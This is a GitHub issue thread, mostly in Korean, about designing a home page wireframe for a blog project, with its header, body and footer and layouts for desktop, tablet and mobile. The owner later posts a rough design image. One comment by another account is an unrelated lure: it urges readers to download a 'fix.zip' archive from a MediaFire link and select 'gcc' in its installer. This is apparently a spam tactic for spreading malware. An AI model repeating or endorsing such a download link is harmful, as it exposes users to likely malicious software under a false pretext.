### ISSUE TITLE
Design Home Page Wireframe

### ISSUE THREAD

**Issue by jhan117** [jhan117/2001Kaye#2]
## 작업 내용

Home 페이지의 기본 레이아웃을 와이어프레임으로 디자인하는 작업입니다.

### 세부 사항
- **헤더**: 로고, 내비게이션 메뉴, 검색 바, 테마 포함
- **본문**: 배경 헤더 이미지, 포스트 리스트, 사이드바 포함
- **푸터**: 저작권 정보, Github 링크 포함

### 요구 사항
- 와이어프레임은 다양한 화면 크기(데스크톱, 태블릿, 모바일)를 고려하여 디자인합니다.

### 추가 정보
- 와이어프레임 디자인을 완료한 후, 이슈를 완료로 표시합니다.

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by jhan117** [comment]
대충 만든 디자인입니다. 바뀔 가능성 있습니다.

![Home](https://github.com/user-attachments/assets/68385a8a-eede-44f4-acf1-a404710b8261)
